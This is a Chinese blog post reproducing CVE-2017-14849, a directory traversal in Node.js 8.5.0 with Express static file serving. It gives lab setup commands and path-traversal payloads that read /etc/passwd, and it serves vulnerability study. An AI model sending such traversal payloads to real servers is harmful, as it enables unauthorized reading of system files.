浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)


Posted in Javascript onNovember 10, 2017

0x00 前言

早上看Sec-news安全文摘的时候,发现腾讯安全应急响应中心发表了一篇文章,Node.js CVE-2017-14849 漏洞分析(https://security.tencent.com/index.php/blog/msg/121),然后想着复现,学习学习,就有了这篇文章。

0x01 漏洞简介

CVE(http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14849)上面的描述是这样的:

Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.

换成我们看的懂的意思就是node.js 8.5.0 到8.6.0 之间的版本会造成目录穿越漏洞,读取任意文件,而漏洞的原因是因为对”..”的处理和另外的模块不兼容。

打个比喻就是有一个人开发这个模块,另外的一个人开发另外个模块,大家对于这个东西的处理不一样,从而导致出现了漏洞。而这里的模块就是node.js 和 express。

影响版本:

Node.js 8.5.0 + Express 3.19.0-3.21.2
Node.js 8.5.0 + Express 4.11.0-4.15.5

0x02 node.js是什么

Node.js® 是一个基于 Chrome V8 引擎的 JavaScript 运行时。 Node.js 使用高效、轻量级的事件驱动、非阻塞 I/O 模型。它的包生态系统,npm,是目前世界上最大的开源库生态系统。(抄从官网)

0x03 express是什么

Express是基于 Node.js 平台,快速、开放、极简的 web 开发框架。(同样抄从官网)

0x04 如何复现

下面采用腾讯云开发者实验室搭建环境进行快速复现。

复现准备:

0. 腾讯云开发者实验室的云主机一台 (我这里用的是《基于 Ubuntu 搭建微信小程序服务》的实验主机 ubuntu 16.04 64位)

1. node.js 8.5.0 (https://nodejs.org/download/release/v8.5.0/)

2. express-4.15.5 (https://github.com/expressjs/express/releases)

3. burpsuite

Step 1安装node.js 8.5.0

下载node.js 8.5.0安装包

wget https://nodejs.org/download/release/v8.5.0/node-v8.5.0-linux-x64.tar.gz

解压安装包

tar -zxvf node-v8.5.0-linux-x64.tar.gz

移到通用软件安装目录/opt

mv node-v8.5.0-linux-x64 /opt/

安装 npm 和 node 命令到系统命令

sudo ln -s /opt/node-v8.5.0-linux-x64 /bin/node /usr/local/bin/node 
sudo ln -s /opt/node-v8.5.0-linux-x64 /bin/npm /usr/local/bin/npm

验证一下:

node -v

输出版本号则表示配置成功

Step2 安装express-4.15.5

下载express-4.15.5

wget https://github.com/expressjs/express/archive/4.15.5.tar.gz

解压压缩包

tar -zxvf 4.15.5.tar.gz

进入express目录下,安装express

cd express-4.15.5 && npm install

进入到expresss-4.15.5/examples/static-files目录里

node index.js

Step 3 发送payload验证

Payload: /../../../a/../../../../etc/passwd

浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)

0x05 漏洞原理分析

为什么payload会是这样的呢?请参考腾讯应急响应中心的那篇文章(https://security.tencent.com/index.php/blog/msg/121),写的很言简意赅。

(还不是因为自己菜,分析不出。。。。)

注意:该漏洞是建立在文件夹通过express.static 来托管的情况下,因为在这种情况下才会使用normalize函数进行path标准化。(发现来源于p神的分析)

比如代码这样写:

app.use(express.static(path.join(__dirname, 'static')));

那么payload应该是

/../../../a/../../../../etc/passwd

但代码如果是这样写的话:

app.use('/static',express.static(path.join(__dirname, 'static')));

那么payload应该为:

/static/../../../a/../../../../etc/passwd

0x06 后记

复现很简单,但分析原理很难。至少我现在还没弄明白。等我弄明白了,再写写怎么分析与跟踪吧。

其实这里有一个挺有意思的点,那就是一些重大漏洞的追踪问题,关于这个漏洞官方早在九月份就已经发布了说明,而这个问题是在最近才得到重视,很明显就算是腾讯也没有第一时间去跟踪CVE的更新列表。

而在腾讯发了这篇文章之后,P神把复现环境给弄到了vulhub(https://github.com/vulhub/vulhub/tree/master/node/CVE-2017-14849),速度之快令人惊奇。然后再代码审计里面发了,在微博里面发了。再接着整个安全圈其实都知道了。

然后这里我们得出了一个结论,如果想要得到第一手漏洞预警与学习,应该时刻关注着CVE列表,努力做第一个吃螃蟹的人。

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持三水点靠木。

Javascript 相关文章推荐
jquery实现多屏多图焦点图切换特效的方法
May 04 Javascript
jQuery中的Deferred和promise 的区别
Apr 03 Javascript
判断js的Array和Object的实现方法
Aug 29 Javascript
快速解决js开发下拉框中blur与click冲突
Oct 10 Javascript
JavaScript中浅讲ajax图文详解
Nov 11 Javascript
自己封装的一个简单的倒计时功能实例
Nov 23 Javascript
angular之ng-template模板加载
Nov 09 Javascript
node.js 基于cheerio的爬虫工具的实现(需要登录权限的爬虫工具)
Apr 10 Javascript
Vue 处理表单input单行文本框的实例代码
May 09 Javascript
Vue函数式组件的应用实例详解
Aug 30 Javascript
vue点击页面空白处实现保存功能
Nov 06 Javascript
vue实现点击按钮切换背景颜色的示例代码
Jun 23 Javascript
angular之ng-template模板加载
Nov 09 #Javascript
深入理解Vue 单向数据流的原理
Nov 09 #Javascript
node.js基于express使用websocket的方法
Nov 09 #Javascript
angular2系列之路由转场动画的示例代码
Nov 09 #Javascript
使用ef6创建oracle数据库的实体模型遇到的问题及解决方案
Nov 09 #Javascript
基于vue配置axios的方法步骤
Nov 09 #Javascript
微信小程序倒计时功能实现代码
Nov 09 #Javascript
You might like
php不使用插件导出excel的简单方法
2014/03/04 PHP
php算法实例分享
2015/07/14 PHP
thinkphp中的url跳转用法分析
2016/07/12 PHP
使用PHPWord生成word文档的方法详解
2019/06/06 PHP
基于JQuery的抓取博客园首页RSS的代码
2011/12/01 Javascript
Jquery写一个鼠标拖动效果实现原理与代码
2012/12/24 Javascript
表单类各种类型(文本框)失去焦点效果jquery代码
2013/04/26 Javascript
javascript截取字符串(通过substring实现并支持中英文混合)
2013/06/24 Javascript
两种不同的方法实现js对checkbox进行全选和反选
2014/05/13 Javascript
分享一个插件实现水珠自动下落效果
2016/06/01 Javascript
详解jQuery lazyload 懒加载
2016/12/19 Javascript
jQuery实现表格元素动态创建功能
2017/01/09 Javascript
微信小程序实现左右联动的实战记录
2018/07/05 Javascript
vue动态循环出的多个select出现过的变为disabled(实例代码)
2019/11/10 Javascript
纯 JS 实现放大缩小拖拽功能(完整代码)
2019/11/25 Javascript
[05:20]卡尔工作室_DOTA2新手教学_DOTA2超强新手功能
2013/04/22 DOTA
pygame学习笔记(6):完成一个简单的游戏
2015/04/15 Python
python实现将汉字转换成汉语拼音的库
2015/05/05 Python
实用自动化运维Python脚本分享
2018/06/04 Python
python爱心表白 每天都是浪漫七夕!
2018/08/18 Python
python ---lambda匿名函数介绍
2019/03/13 Python
使用Python创建简单的HTTP服务器的方法步骤
2019/04/26 Python
如何在Django配置文件里配置session链接
2019/08/06 Python
在pytorch中查看可训练参数的例子
2019/08/18 Python
Pycharm操作Git及GitHub的步骤详解
2020/10/27 Python
美国知名的网上鞋类及相关服装零售商:Shoes.com
2017/05/06 全球购物
英国健身超市:Fitness Superstore
2019/06/17 全球购物
澳大利亚女装精品店:Alannah Hill
2020/07/29 全球购物
毕业求职自荐信格式是什么
2013/11/19 职场文书
服务员岗位职责
2014/01/29 职场文书
会计毕业自我鉴定
2014/02/05 职场文书
2015年农村党员干部主题教育活动总结
2015/03/25 职场文书
jQuery ajax - getScript() 方法和getJSON方法
2021/05/14 jQuery
python+opencv实现视频抽帧示例代码
2021/06/11 Python
Python用tkinter实现自定义记事本的方法详解
2022/03/31 Python
Javascript中Microtask和Macrotask鲜为人知的知识点
2022/04/02 Javascript